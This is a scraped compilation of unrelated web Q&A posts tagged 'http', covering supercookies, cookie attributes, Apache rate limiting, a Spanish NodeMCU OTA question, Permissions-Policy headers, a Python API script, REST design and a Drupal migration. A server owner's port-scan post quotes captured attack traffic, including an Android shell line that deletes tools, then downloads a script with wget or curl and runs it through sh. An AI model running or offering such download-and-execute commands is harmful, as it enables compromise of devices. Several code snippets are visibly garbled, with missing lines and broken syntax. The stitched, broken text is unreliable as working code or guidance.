http – What you can do with super cookies on subdomain to harm domain?

When you search in Google for user cookies top results are VPN services that say that it’s used by ISP to track the users. Wikipedia Supercookie say nothing about HTTP headers and what exactly are super cookies.

I’m interested what the subdomain can do to harm the domain. Are supercookies the same as HSTS supercookies as describe in this question What are HSTS Super Cookies?

I was suggested by some person when we were discussing that will act like umbrella for different subdomains that the domain should be reported to otherwise subdomain can steal login cookies, this is unlikely because in one article (at some VPN company) I read that those are not actually cookies only HTTP headers.

So can someone explain what are exactly super cookies and what potential attacker can do to harm the domain? Or what are any vector attacks the evil person can do with super cookies?

Implement Domain’, ‘HTTP Only’ and ‘Secure’ cookie attributes

How to implement Domain’, ‘HTTP Only’ and ‘Secure’ cookie attributes in SharePoint 2013 internet faced web application is this implementation will do in web.config file of web application?

security – Can I use rate-limiting with HTTP basic authentication in Apache?

So I’m running a few popular web applications on my server. I want these to be reachable from any computer without creating too many vulnerabilities.

I am using Apache 2.4.29 as my HTTP server. My current idea for hiding potential security vulnerabilities in my applications from attackers is to enable HTTP basic authentication (AuthType Basic) for the relevant virtual hosts as an additional security layer. Of course, I’m only allowing SSL connections.

Now this is all quite easy to accomplish. But my question is this: how can I best avoid brute force style attacks with HTTP basic authentication? I.e., how can I enable rate limiting?

My current plan is something like this:

Since I’m using ufw (Uncomplicated Firewall) to limit SSH connections, I thought I could do the same on a specific port I use for HTTPS. However, I see two problems with this:

  1. Can’t an attacker just use Connection: Keep-Alive and keep trying different passwords without even reconnecting? So limiting incoming connections wouldn’t be of any use here.
  2. If I disabled Connection: Keep-Alive somehow, I guess I would run into trouble with the underlying web applications, since they would require a lot of individual connections so the browser can retrieve additional files.

It would be perfect if I could instruct Apache to only keep the connection going for authenticated users and drop it for failed attempts. Is there a way to do this? I am actually not sure what is the default behavior and don’t understand enough about HTTP to easily test this.

arduino – NodeMCU falla al hacer actualizaciones OTA por http

Intento actualizar mediante OTA un nodemcu con display oled con el siguiente codigo:

#include <ESP8266WiFi.h>
#include <ESP8266WiFiMulti.h>

#include <ESP8266HTTPClient.h>
#include <ESP8266httpUpdate.h>

ESP8266WiFiMulti WiFiMulti;

int ledState = LOW;

unsigned long previousMillis = 0;
const long interval = 2000;

int count = 0;

void setup() {

void ota_update() {

  for (uint8_t t = 4; t > 0; t--) {
    Serial.printf("(SETUP) WAIT %d...n", t);

  WiFiMulti.addAP("SSID", "PASS");

  // wait for WiFi connection
  if (( == WL_CONNECTED)) {

    t_httpUpdate_return ret = ESPhttpUpdate.update("");

    switch (ret) {
        Serial.printf("HTTP_UPDATE_FAILD Error (%d): %s", ESPhttpUpdate.getLastError(), ESPhttpUpdate.getLastErrorString().c_str());


      case HTTP_UPDATE_OK:

void loop() {

  unsigned long currentMillis = millis();

  if (currentMillis - previousMillis >= interval) {

    previousMillis = currentMillis;

    if (ledState == LOW)
      ledState = HIGH;  
      ledState = LOW;   

    digitalWrite(LED_BUILTIN, ledState);
    Serial.println("Blink LED at 2 seconds interval");

    count = count + 1;
    if (count > 25) ota_update();

pero al cargar el sketch me muestra el error:

 ets Jan  8 2013,rst cause:2, boot mode:(3,0)

load 0x4010f000, len 3656, room 16 
tail 8
chksum 0x0c
csum 0x0c
e: ets Jan  8 2013,rst cause:3, boot mode:(3,0)

Tengo entendido que el primer boot es necesario para cargar el nuevo sketch.

Ademas cargo el mismo sketch a otro nodemcu sin el display y funciona sin problemas.

La informacion de la placa es:

Flash real id: 00164020
Flash real size: 4194304 bytes
Flash ide size: 4194304 bytes
Flash ide speed: 40000000 Hz
Flash ide mode: DIO
Flash Chip configuration ok.

Placa que genera error:
Nodemcu Display

Placa sin error:

HTTP Header Document Policy vs. Permissions-Policy/Feature-Policy

I’m checking the options to harden my web app by setting the appropriate HTTP-headers.

Besides the Content Security Policy (CSP) there are two another approaches: Document Policy and Permissions-Policy (Feature-Policy).

I’ve checked the W3C Relation to Feature Policy documentation, but still can’t grasp the clear answer wherever I need to set both policies: Document and Permissions or it is overshooting and it’s enough to set just Permissions-Policy?

P.S. Feel free to forward this question to the SE’s Web Applications or StackOverflow portals, if the question doesn’t fit so much this portal.

beginner – Execute bunch of Http Api call using Python

I am working on a project where I need to work with http apis and call them using Python language. Below is what I need to do:

  • Take few input parameters like – environmentName, instanceName, configName.
  • Call get api on a service. Get the json data and compare the configName it already has vs what you want to update from the command line.
  • If config is same then don’t do anything and return back with a message.
  • But if config is different then post new json data with new configName passed from command line in it to the service using http api. In this there are two things:
    • We will make new json with new configName in it along with one more key which is action and value of that will be download. After successfully posting this new json then we will call another api (verifyApi) to verify whether all machines have downloaded successfully that config or not. If they downloaded successfully then we will move to the next step otherwise we will fail and return.
    • If all machines downloaded successfully, then we will change action key to verify in the same json and then we will post it again. After successfully posting this new json, we will call same verifyApi to make sure all machines have verified successfully.

Once everything is successful return otherwise fail it. Below is my code which does the job:

import requests
import json
import sys
import base64

# define all constants
actions=('download', 'verify')

def update( url, json ):
    This will make a PUT api call to update with new json config.
        r = requests.put(url, data=json, headers={'Content-type': 'application/json'})
        return True
    except requests.exceptions.HTTPError as errh:
        print ("Http Error:",errh)
    except requests.exceptions.ConnectionError as errc:
        print ("Error Connecting:",errc)
    except requests.exceptions.Timeout as errt:
        print ("Timeout Error:",errt)
    except requests.exceptions.RequestException as err:
        print ("OOps: Something Else",err)

    return False

def verify( environment, instance, config, action ):
    This will get list of all ipAddresses for that instance in that environment.
    And then check whether each machine from that list have downloaded and verified successfully.
    Basically for each 'action' type I need to verify things.
    If successful at the end then print out the message.
    flag = True
    catalog_url = endpoint.format(environment) + catalog_path.format(instance)
    response = requests.get(catalog_url)
    url = endpoint.format(environment) + status_path.format(instance) + raw
    json_array = response.json()
    count = 0
    for x in json_array:
        ip = x('Address')
        r = requests.get(url.format(ip))
        data = r.json()
        if action == 'download' and "isDownloaded" in data and data('isDownloaded') and "currentCfg" in data and data('currentCfg') == config:
        elif action == 'verify' and  "activeCfg" in data and data('activeCfg') == config:
            flag = False #set to False if above two if statements fail
            print("failed to " +action+ " on " +ip)

    if flag and action='download':
        print("downloaded successfully on all "+count+" machines")
    elif flag and action='verify':
        print("verified successfully on all "+count+" machines")

    return flag

def main():
    # capture inputs from command line
    environment = sys.argv(1)
    instance = sys.argv(2)
    new_config = sys.argv(3)

    # make url for get api to verify whether configs are same or not
    # as mentioned in point 1.
    url=endpoint.format(environment) + config_path.format(instance)
    response = requests.get(url + raw)
    data = json.loads(response.content)
    remote_config = data('remoteConfig')
    # compare remote_config in the json with config passed from command prompt
    if remote_config == new_config:
        print("cannot push same config")

    # config is different
    data('remoteConfig') = new_config
    # now for each action, update json and then verify whether that action completed successfully.
    for action in actions:
        data('action') = action
        if update(url, json.dumps(data)):
            if verify(environment, instance, new_config, action):
                print(action+ " action failed")
            print("failed to update")

if __name__ == "__main__":
    except KeyboardInterrupt:
        print("nCaught ctrl+c, exiting")

Problem Statement

I have my above code which works fine so opting for code review to see if there is any better way to do above things efficiently. I am also sure we can rewrite above things in much cleaner way compared to the way I have since I am relatively new to Python so I may have made lot of mistakes in designing it. Given this code will be run in production wanted to see what can be done to improve this.

Idea is something like this when I run it from command line.

If everything is successful then it should look like this:

python dev master-instace test-config-123.tgz
downloaded successfully on all 10 machines
verified successfully on all 10 machines
config pushed successfully!!

In case of download failure:

python dev master-instace test-config-123.tgz
failed to download on
failed to download on
download action failed

In case of verify failure:

python dev master-instace test-config-123.tgz
failed to verify on
failed to verify on
verify action failed

http – Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts

Recently i wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server impl) on C# and found out that i’m getting requests from totally unknown dudes, such as this one:

   FROM: (::ffff:
POST /cgi-bin/ViewLog.asp HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded


Then, i decided to go further and made a mass port-trap from 90 to 10000 and i found that the most intensive one is the 568 port which stands as ms-shuttle/smb port. Here’s some samples:

(25.11.2020 21:53:46)
   FROM: (::ffff:
| UTF8:
 &�     Cookie: mstshash=hello
(25.11.2020 21:53:33)
   FROM: (::ffff: // <= this dude was spamming me for like 2-4 hrs
| UTF8:
 *�     Cookie: mstshash=Administr
(25.11.2020 16:07:01)
   FROM: (::ffff:
| UTF8:
 X      �  �  ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget; sh wget; busybox wget; sh bwget; busybox curl > bcurl; sh bcurl; curl > curl; sh curl  

I tried to search some info about this port + knock-knocks on it, but didn’t succeeded.
My log file size now exceeds 2 Mb so i wonder, why this is happening? Why this port is so actively being bombed? And, probably, what should i do to prevent receiving those requests?

rest – How to map “mv” operation to HTTP verbs?

In designing a RESTful api the problem arises as to how best to allow resources to be moved between collections.

Renaming a resource could be done by using PATCH but this is not the same thing as moving the resource between collections. Also it is not clear whether it is the resource or the collection which should be patched. Does it make sense to PATCH the resource path of an object in the api if the resource path is not a direct attribute (content) of the resource?

Clearly a DELETE/POST sequence could be used but this involves the use of multiple operations and is not atomic. RFC2616 states:

The PUT method requests that the enclosed entity be stored under the supplied Request-URI.
If the Request-URI refers to an already existing resource, the enclosed entity SHOULD
be considered as a modified version of the one residing on the origin server.

Hence, either the resource is replaces in situ or it is created.

Is the a RESTful way to implement this whilst maintaining atomicity of the operation?

how can i correct some urls for migration from d8 to d7 when missing http?

I am migrating a link from d7 to d8 using the code below but it fails when some urls in the source are missing the "http://" part with this error The URI ‘’ is invalid. You must use a valid URI scheme. How can i process the source to have the http:// added if its missing?

plugin: iterator
source: field_website_url
  uri: url
  title: title
  options: attributes

apache http server – Throttled speed to specific IP address from within home WiFi only

I am experiencing a weird problem where:

  • Accessing my own dedicated server at a hosting provider in France is slow between the hours of 6pm and 10pm.
  • Just accessing this particular IP is slow, not everything else
  • Accessing the IP from my phone for example is fine

I called my ISP and they say they don’t block or throttle anything. I also reset my router completely but the problem persists.

I can download TO my server with no problem and also contacted my server provider. They ran some tests and they get full speed.

What can I do? How can I find out what is causing this issue?